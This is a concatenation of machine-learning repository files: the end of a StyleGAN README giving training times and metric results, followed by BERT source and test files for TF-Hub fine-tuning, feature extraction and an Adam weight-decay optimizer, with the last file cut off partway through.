`results/<ID>-<DESCRIPTION>`. 4. The training may take several days (or weeks) to complete, depending on the configuration. By default, `train.py` is configured to train the highest-quality StyleGAN (configuration F in Table 1) for the FFHQ dataset at 1024&times;1024 resolution using 8 GPUs. Please note that we have used 8 GPUs in all of our experiments. Training with fewer GPUs may not produce identical results &ndash; if you wish to compare against our technique, we strongly recommend using the same number of GPUs. Expected training times for the default configuration using Tesla V100 GPUs: | GPUs | 1024&times;1024 | 512&times;512 | 256&times;256 | | :--- | :-------------- | :------------ | :------------ | | 1 | 41 days 4 hours | 24 days 21 hours | 14 days 22 hours | | 2 | 21 days 22 hours | 13 days 7 hours | 9 days 5 hours | | 4 | 11 days 8 hours | 7 days 0 hours | 4 days 21 hours | | 8 | 6 days 14 hours | 4 days 10 hours | 3 days 8 hours | ## Evaluating quality and disentanglement The quality and disentanglement metrics used in our paper can be evaluated using [run_metrics.py](./run_metrics.py). By default, the script will evaluate the Fr&eacute;chet Inception Distance (`fid50k`) for the pre-trained FFHQ generator and write the results into a newly created directory under `results`. The exact behavior can be changed by uncommenting or editing specific lines in [run_metrics.py](./run_metrics.py). Expected evaluation time and results for the pre-trained FFHQ generator using one Tesla V100 GPU: | Metric | Time | Result | Description | :----- | :--- | :----- | :---------- | fid50k | 16 min | 4.4159 | Fr&eacute;chet Inception Distance using 50,000 images. | ppl_zfull | 55 min | 664.8854 | Perceptual Path Length for full paths in *Z*. | ppl_wfull | 55 min | 233.3059 | Perceptual Path Length for full paths in *W*. | ppl_zend | 55 min | 666.1057 | Perceptual Path Length for path endpoints in *Z*. | ppl_wend | 55 min | 197.2266 | Perceptual Path Length for path endpoints in *W*. | ls | 10 hours | z: 165.0106<br>w: 3.7447 | Linear Separability in *Z* and *W*. Please note that the exact results may vary from run to run due to the non-deterministic nature of TensorFlow. ## Acknowledgements We thank Jaakko Lehtinen, David Luebke, and Tuomas Kynk&auml;&auml;nniemi for in-depth discussions and helpful comments; Janne Hellsten, Tero Kuosmanen, and Pekka J&auml;nis for compute infrastructure and help with the code release.
bert
eedf5716ce1268e56f0a50264a88cafad334ac61
File: run_classifier_with_tfhub.py # coding=utf-8 # Copyright 2018 The Google AI Language Team Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """BERT finetuning runner with TF-Hub.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import optimization import run_classifier import tokenization import tensorflow as tf import tensorflow_hub as hub flags = tf.flags FLAGS = flags.FLAGS flags.DEFINE_string( "bert_hub_module_handle", None, "Handle for the BERT TF-Hub module.") def create_model(is_training, input_ids, input_mask, segment_ids, labels, num_labels, bert_hub_module_handle): """Creates a classification model.""" tags = set() if is_training: tags.add("train") bert_module = hub.Module(bert_hub_module_handle, tags=tags, trainable=True) bert_inputs = dict( input_ids=input_ids, input_mask=input_mask, segment_ids=segment_ids) bert_outputs = bert_module( inputs=bert_inputs, signature="tokens", as_dict=True) # In the demo, we are doing a simple classification task on the entire # segment. # # If you want to use the token-level output, use # bert_outputs["sequence_output"] instead. output_layer = bert_outputs["pooled_output"] hidden_size = output_layer.shape[-1].value output_weights = tf.get_variable( "output_weights", [num_labels, hidden_size], initializer=tf.truncated_normal_initializer(stddev=0.02)) output_bias = tf.get_variable( "output_bias", [num_labels], initializer=tf.zeros_initializer()) with tf.variable_scope("loss"): if is_training: # I.e., 0.1 dropout output_layer = tf.nn.dropout(output_layer, keep_prob=0.9) logits = tf.matmul(output_layer, output_weights, transpose_b=True) logits = tf.nn.bias_add(logits, output_bias) probabilities = tf.nn.softmax(logits, axis=-1) log_probs = tf.nn.log_softmax(logits, axis=-1) one_hot_labels = tf.one_hot(labels, depth=num_labels, dtype=tf.float32) per_example_loss = -tf.reduce_sum(one_hot_labels * log_probs, axis=-1) loss = tf.reduce_mean(per_example_loss) return (loss, per_example_loss, logits, probabilities) def model_fn_builder(num_labels, learning_rate, num_train_steps, num_warmup_steps, use_tpu, bert_hub_module_handle): """Returns `model_fn` closure for TPUEstimator.""" def model_fn(features, labels, mode, params): # pylint: disable=unused-argument """The `model_fn` for TPUEstimator.""" tf.logging.info("*** Features ***") for name in sorted(features.keys()): tf.logging.info(" name = %s, shape = %s" % (name, features[name].shape)) input_ids = features["input_ids"] input_mask = features["input_mask"] segment_ids = features["segment_ids"] label_ids = features["label_ids"] is_training = (mode == tf.estimator.ModeKeys.TRAIN) (total_loss, per_example_loss, logits, probabilities) = create_model( is_training, input_ids, input_mask, segment_ids, label_ids, num_labels, bert_hub_module_handle) output_spec = None if mode == tf.estimator.ModeKeys.TRAIN: train_op = optimization.create_optimizer( total_loss, learning_rate, num_train_steps, num_warmup_steps, use_tpu) output_spec = tf.contrib.tpu.TPUEstimatorSpec( mode=mode, loss=total_loss, train_op=train_op) elif mode == tf.estimator.ModeKeys.EVAL: def metric_fn(per_example_loss, label_ids, logits): predictions = tf.argmax(logits, axis=-1, output_type=tf.int32) accuracy = tf.metrics.accuracy(label_ids, predictions) loss = tf.metrics.mean(per_example_loss) return { "eval_accuracy": accuracy, "eval_loss": loss, } eval_metrics = (metric_fn, [per_example_loss, label_ids, logits]) output_spec = tf.contrib.tpu.TPUEstimatorSpec( mode=mode, loss=total_loss, eval_metrics=eval_metrics) elif mode == tf.estimator.ModeKeys.PREDICT: output_spec = tf.contrib.tpu.TPUEstimatorSpec( mode=mode, predictions={"probabilities": probabilities}) else: raise ValueError( "Only TRAIN, EVAL and PREDICT modes are supported: %s" % (mode)) return output_spec return model_fn def create_tokenizer_from_hub_module(bert_hub_module_handle): """Get the vocab file and casing info from the Hub module.""" with tf.Graph().as_default(): bert_module = hub.Module(bert_hub_module_handle) tokenization_info = bert_module(signature="tokenization_info", as_dict=True) with tf.Session() as sess: vocab_file, do_lower_case = sess.run([tokenization_info["vocab_file"], tokenization_info["do_lower_case"]]) return tokenization.FullTokenizer( vocab_file=vocab_file, do_lower_case=do_lower_case) def main(_): tf.logging.set_verbosity(tf.logging.INFO) processors = { "cola": run_classifier.ColaProcessor, "mnli": run_classifier.MnliProcessor, "mrpc": run_classifier.MrpcProcessor, } if not FLAGS.do_train and not FLAGS.do_eval: raise ValueError("At least one of `do_train` or `do_eval` must be True.") tf.gfile.MakeDirs(FLAGS.output_dir) task_name = FLAGS.task_name.lower() if task_name not in processors: raise ValueError("Task not found: %s" % (task_name)) processor = processors[task_name]() label_list = processor.get_labels() tokenizer = create_tokenizer_from_hub_module(FLAGS.bert_hub_module_handle) tpu_cluster_resolver = None if FLAGS.use_tpu and FLAGS.tpu_name: tpu_cluster_resolver = tf.contrib.cluster_resolver.TPUClusterResolver( FLAGS.tpu_name, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project) is_per_host = tf.contrib.tpu.InputPipelineConfig.PER_HOST_V2 run_config = tf.contrib.tpu.RunConfig( cluster=tpu_cluster_resolver, master=FLAGS.master, model_dir=FLAGS.output_dir, save_checkpoints_steps=FLAGS.save_checkpoints_steps, tpu_config=tf.contrib.tpu.TPUConfig( iterations_per_loop=FLAGS.iterations_per_loop, num_shards=FLAGS.num_tpu_cores, per_host_input_for_training=is_per_host)) train_examples = None num_train_steps = None num_warmup_steps = None if FLAGS.do_train: train_examples = processor.get_train_examples(FLAGS.data_dir) num_train_steps = int( len(train_examples) / FLAGS.train_batch_size * FLAGS.num_train_epochs) num_warmup_steps = int(num_train_steps * FLAGS.warmup_proportion) model_fn = model_fn_builder( num_labels=len(label_list), learning_rate=FLAGS.learning_rate, num_train_steps=num_train_steps, num_warmup_steps=num_warmup_steps, use_tpu=FLAGS.use_tpu, bert_hub_module_handle=FLAGS.bert_hub_module_handle) # If TPU is not available, this will fall back to normal Estimator on CPU # or GPU. estimator = tf.contrib.tpu.TPUEstimator( use_tpu=FLAGS.use_tpu, model_fn=model_fn, config=run_config, train_batch_size=FLAGS.train_batch_size, eval_batch_size=FLAGS.eval_batch_size, predict_batch_size=FLAGS.predict_batch_size) if FLAGS.do_train: train_features = run_classifier.convert_examples_to_features( train_examples, label_list, FLAGS.max_seq_length, tokenizer) tf.logging.info("***** Running training *****") tf.logging.info(" Num examples = %d", len(train_examples)) tf.logging.info(" Batch size = %d", FLAGS.train_batch_size) tf.logging.info(" Num steps = %d", num_train_steps) train_input_fn = run_classifier.input_fn_builder( features=train_features, seq_length=FLAGS.max_seq_length, is_training=True, drop_remainder=True) estimator.train(input_fn=train_input_fn, max_steps=num_train_steps) if FLAGS.do_eval: eval_examples = processor.get_dev_examples(FLAGS.data_dir) eval_features = run_classifier.convert_examples_to_features( eval_examples, label_list, FLAGS.max_seq_length, tokenizer) tf.logging.info("***** Running evaluation *****") tf.logging.info(" Num examples = %d", len(eval_examples)) tf.logging.info(" Batch size = %d", FLAGS.eval_batch_size) # This tells the estimator to run through the entire set. eval_steps = None # However, if running eval on the TPU, you will need to specify the # number of steps. if FLAGS.use_tpu: # Eval will be slightly WRONG on the TPU because it will truncate # the last batch. eval_steps = int(len(eval_examples) / FLAGS.eval_batch_size) eval_drop_remainder = True if FLAGS.use_tpu else False eval_input_fn = run_classifier.input_fn_builder( features=eval_features, seq_length=FLAGS.max_seq_length, is_training=False, drop_remainder=eval_drop_remainder) result = estimator.evaluate(input_fn=eval_input_fn, steps=eval_steps) output_eval_file = os.path.join(FLAGS.output_dir, "eval_results.txt") with tf.gfile.GFile(output_eval_file, "w") as writer: tf.logging.info("***** Eval results *****") for key in sorted(result.keys()): tf.logging.info(" %s = %s", key, str(result[key])) writer.write("%s = %s\n" % (key, str(result[key]))) if FLAGS.do_predict: predict_examples = processor.get_test_examples(FLAGS.data_dir) if FLAGS.use_tpu: # Discard batch remainder if running on TPU n = len(predict_examples) predict_examples = predict_examples[:(n - n % FLAGS.predict_batch_size)] predict_file = os.path.join(FLAGS.output_dir, "predict.tf_record") run_classifier.file_based_convert_examples_to_features( predict_examples, label_list, FLAGS.max_seq_length, tokenizer, predict_file) tf.logging.info("***** Running prediction*****") tf.logging.info(" Num examples = %d", len(predict_examples)) tf.logging.info(" Batch size = %d", FLAGS.predict_batch_size) predict_input_fn = run_classifier.file_based_input_fn_builder( input_file=predict_file, seq_length=FLAGS.max_seq_length, is_training=False, drop_remainder=FLAGS.use_tpu) result = estimator.predict(input_fn=predict_input_fn) output_predict_file = os.path.join(FLAGS.output_dir, "test_results.tsv") with tf.gfile.GFile(output_predict_file, "w") as writer: tf.logging.info("***** Predict results *****") for prediction in result: probabilities = prediction["probabilities"] output_line = "\t".join( str(class_probability) for class_probability in probabilities) + "\n" writer.write(output_line) if __name__ == "__main__": flags.mark_flag_as_required("data_dir") flags.mark_flag_as_required("task_name") flags.mark_flag_as_required("bert_hub_module_handle") flags.mark_flag_as_required("output_dir") tf.app.run() File: modeling_test.py # coding=utf-8 # Copyright 2018 The Google AI Language Team Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import json import random import re import modeling import six import tensorflow as tf class BertModelTest(tf.test.TestCase): class BertModelTester(object): def __init__(self, parent, batch_size=13, seq_length=7, is_training=True, use_input_mask=True, use_token_type_ids=True, vocab_size=99, hidden_size=32, num_hidden_layers=5, num_attention_heads=4, intermediate_size=37, hidden_act="gelu", hidden_dropout_prob=0.1, attention_probs_dropout_prob=0.1, max_position_embeddings=512, type_vocab_size=16, initializer_range=0.02, scope=None): self.parent = parent self.batch_size = batch_size self.seq_length = seq_length self.is_training = is_training self.use_input_mask = use_input_mask self.use_token_type_ids = use_token_type_ids self.vocab_size = vocab_size self.hidden_size = hidden_size self.num_hidden_layers = num_hidden_layers self.num_attention_heads = num_attention_heads self.intermediate_size = intermediate_size self.hidden_act = hidden_act self.hidden_dropout_prob = hidden_dropout_prob self.attention_probs_dropout_prob = attention_probs_dropout_prob self.max_position_embeddings = max_position_embeddings self.type_vocab_size = type_vocab_size self.initializer_range = initializer_range self.scope = scope def create_model(self): input_ids = BertModelTest.ids_tensor([self.batch_size, self.seq_length], self.vocab_size) input_mask = None if self.use_input_mask: input_mask = BertModelTest.ids_tensor( [self.batch_size, self.seq_length], vocab_size=2) token_type_ids = None if self.use_token_type_ids: token_type_ids = BertModelTest.ids_tensor( [self.batch_size, self.seq_length], self.type_vocab_size) config = modeling.BertConfig( vocab_size=self.vocab_size, hidden_size=self.hidden_size, num_hidden_layers=self.num_hidden_layers, num_attention_heads=self.num_attention_heads, intermediate_size=self.intermediate_size, hidden_act=self.hidden_act, hidden_dropout_prob=self.hidden_dropout_prob, attention_probs_dropout_prob=self.attention_probs_dropout_prob, max_position_embeddings=self.max_position_embeddings, type_vocab_size=self.type_vocab_size, initializer_range=self.initializer_range) model = modeling.BertModel( config=config, is_training=self.is_training, input_ids=input_ids, input_mask=input_mask, token_type_ids=token_type_ids, scope=self.scope) outputs = { "embedding_output": model.get_embedding_output(), "sequence_output": model.get_sequence_output(), "pooled_output": model.get_pooled_output(), "all_encoder_layers": model.get_all_encoder_layers(), } return outputs def check_output(self, result): self.parent.assertAllEqual( result["embedding_output"].shape, [self.batch_size, self.seq_length, self.hidden_size]) self.parent.assertAllEqual( result["sequence_output"].shape, [self.batch_size, self.seq_length, self.hidden_size]) self.parent.assertAllEqual(result["pooled_output"].shape, [self.batch_size, self.hidden_size]) def test_default(self): self.run_tester(BertModelTest.BertModelTester(self)) def test_config_to_json_string(self): config = modeling.BertConfig(vocab_size=99, hidden_size=37) obj = json.loads(config.to_json_string()) self.assertEqual(obj["vocab_size"], 99) self.assertEqual(obj["hidden_size"], 37) def run_tester(self, tester): with self.test_session() as sess: ops = tester.create_model() init_op = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer()) sess.run(init_op) output_result = sess.run(ops) tester.check_output(output_result) self.assert_all_tensors_reachable(sess, [init_op, ops]) @classmethod def ids_tensor(cls, shape, vocab_size, rng=None, name=None): """Creates a random int32 tensor of the shape within the vocab size.""" if rng is None: rng = random.Random() total_dims = 1 for dim in shape: total_dims *= dim values = [] for _ in range(total_dims): values.append(rng.randint(0, vocab_size - 1)) return tf.constant(value=values, dtype=tf.int32, shape=shape, name=name) def assert_all_tensors_reachable(self, sess, outputs): """Checks that all the tensors in the graph are reachable from outputs.""" graph = sess.graph ignore_strings = [ "^.*/assert_less_equal/.*$", "^.*/dilation_rate$", "^.*/Tensordot/concat$", "^.*/Tensordot/concat/axis$", "^testing/.*$", ] ignore_regexes = [re.compile(x) for x in ignore_strings] unreachable = self.get_unreachable_ops(graph, outputs) filtered_unreachable = [] for x in unreachable: do_ignore = False for r in ignore_regexes: m = r.match(x.name) if m is not None: do_ignore = True if do_ignore: continue filtered_unreachable.append(x) unreachable = filtered_unreachable self.assertEqual( len(unreachable), 0, "The following ops are unreachable: %s" % (" ".join([x.name for x in unreachable]))) @classmethod def get_unreachable_ops(cls, graph, outputs): """Finds all of the tensors in graph that are unreachable from outputs.""" outputs = cls.flatten_recursive(outputs) output_to_op = collections.defaultdict(list) op_to_all = collections.defaultdict(list) assign_out_to_in = collections.defaultdict(list) for op in graph.get_operations(): for x in op.inputs: op_to_all[op.name].append(x.name) for y in op.outputs: output_to_op[y.name].append(op.name) op_to_all[op.name].append(y.name) if str(op.type) == "Assign": for y in op.outputs: for x in op.inputs: assign_out_to_in[y.name].append(x.name) assign_groups = collections.defaultdict(list) for out_name in assign_out_to_in.keys(): name_group = assign_out_to_in[out_name] for n1 in name_group: assign_groups[n1].append(out_name) for n2 in name_group: if n1 != n2: assign_groups[n1].append(n2) seen_tensors = {} stack = [x.name for x in outputs] while stack: name = stack.pop() if name in seen_tensors: continue seen_tensors[name] = True if name in output_to_op: for op_name in output_to_op[name]: if op_name in op_to_all: for input_name in op_to_all[op_name]: if input_name not in stack: stack.append(input_name) expanded_names = [] if name in assign_groups: for assign_name in assign_groups[name]: expanded_names.append(assign_name) for expanded_name in expanded_names: if expanded_name not in stack: stack.append(expanded_name) unreachable_ops = [] for op in graph.get_operations(): is_unreachable = False all_names = [x.name for x in op.inputs] + [x.name for x in op.outputs] for name in all_names: if name not in seen_tensors: is_unreachable = True if is_unreachable: unreachable_ops.append(op) return unreachable_ops @classmethod def flatten_recursive(cls, item): """Flattens (potentially nested) a tuple/dictionary/list to a list.""" output = [] if isinstance(item, list): output.extend(item) elif isinstance(item, tuple): output.extend(list(item)) elif isinstance(item, dict): for (_, v) in six.iteritems(item): output.append(v) else: return [item] flat_output = [] for x in output: flat_output.extend(cls.flatten_recursive(x)) return flat_output if __name__ == "__main__": tf.test.main() File: extract_features.py # coding=utf-8 # Copyright 2018 The Google AI Language Team Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Extract pre-computed feature vectors from BERT.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import codecs import collections import json import re import modeling import tokenization import tensorflow as tf flags = tf.flags FLAGS = flags.FLAGS flags.DEFINE_string("input_file", None, "") flags.DEFINE_string("output_file", None, "") flags.DEFINE_string("layers", "-1,-2,-3,-4", "") flags.DEFINE_string( "bert_config_file", None, "The config json file corresponding to the pre-trained BERT model. " "This specifies the model architecture.") flags.DEFINE_integer( "max_seq_length", 128, "The maximum total input sequence length after WordPiece tokenization. " "Sequences longer than this will be truncated, and sequences shorter " "than this will be padded.") flags.DEFINE_string( "init_checkpoint", None, "Initial checkpoint (usually from a pre-trained BERT model).") flags.DEFINE_string("vocab_file", None, "The vocabulary file that the BERT model was trained on.") flags.DEFINE_bool( "do_lower_case", True, "Whether to lower case the input text. Should be True for uncased " "models and False for cased models.") flags.DEFINE_integer("batch_size", 32, "Batch size for predictions.") flags.DEFINE_bool("use_tpu", False, "Whether to use TPU or GPU/CPU.") flags.DEFINE_string("master", None, "If using a TPU, the address of the master.") flags.DEFINE_integer( "num_tpu_cores", 8, "Only used if `use_tpu` is True. Total number of TPU cores to use.") flags.DEFINE_bool( "use_one_hot_embeddings", False, "If True, tf.one_hot will be used for embedding lookups, otherwise " "tf.nn.embedding_lookup will be used. On TPUs, this should be True " "since it is much faster.") class InputExample(object): def __init__(self, unique_id, text_a, text_b): self.unique_id = unique_id self.text_a = text_a self.text_b = text_b class InputFeatures(object): """A single set of features of data.""" def __init__(self, unique_id, tokens, input_ids, input_mask, input_type_ids): self.unique_id = unique_id self.tokens = tokens self.input_ids = input_ids self.input_mask = input_mask self.input_type_ids = input_type_ids def input_fn_builder(features, seq_length): """Creates an `input_fn` closure to be passed to TPUEstimator.""" all_unique_ids = [] all_input_ids = [] all_input_mask = [] all_input_type_ids = [] for feature in features: all_unique_ids.append(feature.unique_id) all_input_ids.append(feature.input_ids) all_input_mask.append(feature.input_mask) all_input_type_ids.append(feature.input_type_ids) def input_fn(params): """The actual input function.""" batch_size = params["batch_size"] num_examples = len(features) # This is for demo purposes and does NOT scale to large data sets. We do # not use Dataset.from_generator() because that uses tf.py_func which is # not TPU compatible. The right way to load data is with TFRecordReader. d = tf.data.Dataset.from_tensor_slices({ "unique_ids": tf.constant(all_unique_ids, shape=[num_examples], dtype=tf.int32), "input_ids": tf.constant( all_input_ids, shape=[num_examples, seq_length], dtype=tf.int32), "input_mask": tf.constant( all_input_mask, shape=[num_examples, seq_length], dtype=tf.int32), "input_type_ids": tf.constant( all_input_type_ids, shape=[num_examples, seq_length], dtype=tf.int32), }) d = d.batch(batch_size=batch_size, drop_remainder=False) return d return input_fn def model_fn_builder(bert_config, init_checkpoint, layer_indexes, use_tpu, use_one_hot_embeddings): """Returns `model_fn` closure for TPUEstimator.""" def model_fn(features, labels, mode, params): # pylint: disable=unused-argument """The `model_fn` for TPUEstimator.""" unique_ids = features["unique_ids"] input_ids = features["input_ids"] input_mask = features["input_mask"] input_type_ids = features["input_type_ids"] model = modeling.BertModel( config=bert_config, is_training=False, input_ids=input_ids, input_mask=input_mask, token_type_ids=input_type_ids, use_one_hot_embeddings=use_one_hot_embeddings) if mode != tf.estimator.ModeKeys.PREDICT: raise ValueError("Only PREDICT modes are supported: %s" % (mode)) tvars = tf.trainable_variables() scaffold_fn = None (assignment_map, initialized_variable_names) = modeling.get_assignment_map_from_checkpoint( tvars, init_checkpoint) if use_tpu: def tpu_scaffold(): tf.train.init_from_checkpoint(init_checkpoint, assignment_map) return tf.train.Scaffold() scaffold_fn = tpu_scaffold else: tf.train.init_from_checkpoint(init_checkpoint, assignment_map) tf.logging.info("**** Trainable Variables ****") for var in tvars: init_string = "" if var.name in initialized_variable_names: init_string = ", *INIT_FROM_CKPT*" tf.logging.info(" name = %s, shape = %s%s", var.name, var.shape, init_string) all_layers = model.get_all_encoder_layers() predictions = { "unique_id": unique_ids, } for (i, layer_index) in enumerate(layer_indexes): predictions["layer_output_%d" % i] = all_layers[layer_index] output_spec = tf.contrib.tpu.TPUEstimatorSpec( mode=mode, predictions=predictions, scaffold_fn=scaffold_fn) return output_spec return model_fn def convert_examples_to_features(examples, seq_length, tokenizer): """Loads a data file into a list of `InputBatch`s.""" features = [] for (ex_index, example) in enumerate(examples): tokens_a = tokenizer.tokenize(example.text_a) tokens_b = None if example.text_b: tokens_b = tokenizer.tokenize(example.text_b) if tokens_b: # Modifies `tokens_a` and `tokens_b` in place so that the total # length is less than the specified length. # Account for [CLS], [SEP], [SEP] with "- 3" _truncate_seq_pair(tokens_a, tokens_b, seq_length - 3) else: # Account for [CLS] and [SEP] with "- 2" if len(tokens_a) > seq_length - 2: tokens_a = tokens_a[0:(seq_length - 2)] # The convention in BERT is: # (a) For sequence pairs: # tokens: [CLS] is this jack ##son ##ville ? [SEP] no it is not . [SEP] # type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1 # (b) For single sequences: # tokens: [CLS] the dog is hairy . [SEP] # type_ids: 0 0 0 0 0 0 0 # # Where "type_ids" are used to indicate whether this is the first # sequence or the second sequence. The embedding vectors for `type=0` and # `type=1` were learned during pre-training and are added to the wordpiece # embedding vector (and position vector). This is not *strictly* necessary # since the [SEP] token unambiguously separates the sequences, but it makes # it easier for the model to learn the concept of sequences. # # For classification tasks, the first vector (corresponding to [CLS]) is # used as as the "sentence vector". Note that this only makes sense because # the entire model is fine-tuned. tokens = [] input_type_ids = [] tokens.append("[CLS]") input_type_ids.append(0) for token in tokens_a: tokens.append(token) input_type_ids.append(0) tokens.append("[SEP]") input_type_ids.append(0) if tokens_b: for token in tokens_b: tokens.append(token) input_type_ids.append(1) tokens.append("[SEP]") input_type_ids.append(1) input_ids = tokenizer.convert_tokens_to_ids(tokens) # The mask has 1 for real tokens and 0 for padding tokens. Only real # tokens are attended to. input_mask = [1] * len(input_ids) # Zero-pad up to the sequence length. while len(input_ids) < seq_length: input_ids.append(0) input_mask.append(0) input_type_ids.append(0) assert len(input_ids) == seq_length assert len(input_mask) == seq_length assert len(input_type_ids) == seq_length if ex_index < 5: tf.logging.info("*** Example ***") tf.logging.info("unique_id: %s" % (example.unique_id)) tf.logging.info("tokens: %s" % " ".join( [tokenization.printable_text(x) for x in tokens])) tf.logging.info("input_ids: %s" % " ".join([str(x) for x in input_ids])) tf.logging.info("input_mask: %s" % " ".join([str(x) for x in input_mask])) tf.logging.info( "input_type_ids: %s" % " ".join([str(x) for x in input_type_ids])) features.append( InputFeatures( unique_id=example.unique_id, tokens=tokens, input_ids=input_ids, input_mask=input_mask, input_type_ids=input_type_ids)) return features def _truncate_seq_pair(tokens_a, tokens_b, max_length): """Truncates a sequence pair in place to the maximum length.""" # This is a simple heuristic which will always truncate the longer sequence # one token at a time. This makes more sense than truncating an equal percent # of tokens from each, since if one sequence is very short then each token # that's truncated likely contains more information than a longer sequence. while True: total_length = len(tokens_a) + len(tokens_b) if total_length <= max_length: break if len(tokens_a) > len(tokens_b): tokens_a.pop() else: tokens_b.pop() def read_examples(input_file): """Read a list of `InputExample`s from an input file.""" examples = [] unique_id = 0 with tf.gfile.GFile(input_file, "r") as reader: while True: line = tokenization.convert_to_unicode(reader.readline()) if not line: break line = line.strip() text_a = None text_b = None m = re.match(r"^(.*) \|\|\| (.*)$", line) if m is None: text_a = line else: text_a = m.group(1) text_b = m.group(2) examples.append( InputExample(unique_id=unique_id, text_a=text_a, text_b=text_b)) unique_id += 1 return examples def main(_): tf.logging.set_verbosity(tf.logging.INFO) layer_indexes = [int(x) for x in FLAGS.layers.split(",")] bert_config = modeling.BertConfig.from_json_file(FLAGS.bert_config_file) tokenizer = tokenization.FullTokenizer( vocab_file=FLAGS.vocab_file, do_lower_case=FLAGS.do_lower_case) is_per_host = tf.contrib.tpu.InputPipelineConfig.PER_HOST_V2 run_config = tf.contrib.tpu.RunConfig( master=FLAGS.master, tpu_config=tf.contrib.tpu.TPUConfig( num_shards=FLAGS.num_tpu_cores, per_host_input_for_training=is_per_host)) examples = read_examples(FLAGS.input_file) features = convert_examples_to_features( examples=examples, seq_length=FLAGS.max_seq_length, tokenizer=tokenizer) unique_id_to_feature = {} for feature in features: unique_id_to_feature[feature.unique_id] = feature model_fn = model_fn_builder( bert_config=bert_config, init_checkpoint=FLAGS.init_checkpoint, layer_indexes=layer_indexes, use_tpu=FLAGS.use_tpu, use_one_hot_embeddings=FLAGS.use_one_hot_embeddings) # If TPU is not available, this will fall back to normal Estimator on CPU # or GPU. estimator = tf.contrib.tpu.TPUEstimator( use_tpu=FLAGS.use_tpu, model_fn=model_fn, config=run_config, predict_batch_size=FLAGS.batch_size) input_fn = input_fn_builder( features=features, seq_length=FLAGS.max_seq_length) with codecs.getwriter("utf-8")(tf.gfile.Open(FLAGS.output_file, "w")) as writer: for result in estimator.predict(input_fn, yield_single_examples=True): unique_id = int(result["unique_id"]) feature = unique_id_to_feature[unique_id] output_json = collections.OrderedDict() output_json["linex_index"] = unique_id all_features = [] for (i, token) in enumerate(feature.tokens): all_layers = [] for (j, layer_index) in enumerate(layer_indexes): layer_output = result["layer_output_%d" % j] layers = collections.OrderedDict() layers["index"] = layer_index layers["values"] = [ round(float(x), 6) for x in layer_output[i:(i + 1)].flat ] all_layers.append(layers) features = collections.OrderedDict() features["token"] = token features["layers"] = all_layers all_features.append(features) output_json["features"] = all_features writer.write(json.dumps(output_json) + "\n") if __name__ == "__main__": flags.mark_flag_as_required("input_file") flags.mark_flag_as_required("vocab_file") flags.mark_flag_as_required("bert_config_file") flags.mark_flag_as_required("init_checkpoint") flags.mark_flag_as_required("output_file") tf.app.run() File: optimization_test.py # coding=utf-8 # Copyright 2018 The Google AI Language Team Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import absolute_import from __future__ import division from __future__ import print_function import optimization import tensorflow as tf class OptimizationTest(tf.test.TestCase): def test_adam(self): with self.test_session() as sess: w = tf.get_variable( "w", shape=[3], initializer=tf.constant_initializer([0.1, -0.2, -0.1])) x = tf.constant([0.4, 0.2, -0.5]) loss = tf.reduce_mean(tf.square(x - w)) tvars = tf.trainable_variables() grads = tf.gradients(loss, tvars) global_step = tf.train.get_or_create_global_step() optimizer = optimization.AdamWeightDecayOptimizer(learning_rate=0.2) train_op = optimizer.apply_gradients(zip(grads, tvars), global_step) init_op = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer()) sess.run(init_op) for _ in range(100): sess.run(train_op) w_np = sess.run(w) self.assertAllClose(w_np.flat, [0.4, 0.2, -0.5], rtol=1e-2, atol=1e-2) if __name__ == "__main__": tf.test.main() File: optimization.py # coding=utf-8 # Copyright 2018 The Google AI Language Team Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Functions and classes related to optimization (weight updates).""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import re import tensorflow as tf def create_optimizer(loss, init_lr, num_train_steps, num_warmup_steps, use_tpu): """Creates an optimizer training op.""" global_step = tf.train.get_or_create_global_step() learning_rate = tf.constant(value=init_lr, shape=[], dtype=tf.float32) # Implements linear decay of the learning rate. learning_rate = tf.train.polynomial_decay( learning_rate, global_step, num_train_steps, end_learning_rate=0.0, power=1.0, cycle=False) # Implements linear warmup. I.e., if global_step < num_warmup_steps, the # learning rate will be `global_step/num_warmup_steps * init_lr`. if num_warmup_steps: global_steps_int = tf.cast(global_step, tf.int32) warmup_steps_int = tf.constant(num_warmup_steps, dtype=tf.int32) global_steps_float = tf.cast(global_steps_int, tf.float32) warmup_steps_float = tf.cast(warmup_steps_int, tf.float32) warmup_percent_done = 